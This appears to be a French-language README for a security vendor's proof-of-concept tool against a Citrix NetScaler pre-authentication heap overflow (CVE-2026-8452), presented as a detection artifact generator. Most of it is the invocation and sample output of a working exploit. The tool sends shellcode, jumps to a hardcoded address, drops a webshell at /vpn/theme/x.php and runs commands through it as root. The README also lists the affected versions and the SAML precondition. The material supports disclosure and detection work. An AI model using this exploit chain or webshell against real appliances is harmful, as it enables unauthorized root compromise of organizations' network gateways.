
CVE-2026-8452 PreAuth RCE
Générateur d'artefacts de détection pour Citrix NetScaler CVE-2026-8452
Voir notre article de blog pour les détails techniques.
python3 watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py --target https://172.16.5.12:9443/
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py
(*) Citrix NetScaler PreAuth Heap overflow to RCE Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-8452]
[*] Connecting to endpoint...
[*] target AAA service is responsive
[*] building shellcode
[+] shellcode size: 268 bytes
[*] triggering jmp rax to 0x112d30180
[*] sent..
[+] webshell will be at https://172.16.5.12:9443/vpn/theme/x.php?0=uname+-a;id
[+] web shell output:
FreeBSD something 11.4-NETSCALER-13.1 FreeBSD 11.4-NETSCALER-13.1 #0 ef731ca813f0(heads/artesa_30_52)-dirty: Wed Aug 24 08:24:55 PDT 2022 root@sjc-bld-bsd114-215:/usr/obj/usr/home/build/adc/usr.src/sys/NS64 amd64
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)
tous les offsets/adresses sont codés en dur pour la version 13.1-30.52 de NetScaler
La vulnérabilité est exploitable lorsque l'appliance Netscaler est configurée pour utiliser SAML en tant que fournisseur de services (SP) ou que fournisseur d'identité (IdP).
Citrix répertorie les versions suivantes comme étant affectées :
NetScaler ADC et NetScaler Gateway 14.1 AVANT 14.1-72.61 NetScaler ADC et NetScaler Gateway 13.1 AVANT 13.1-63.18
Pour les dernières recherches en sécurité, suivez l'équipe des Labs watchTowr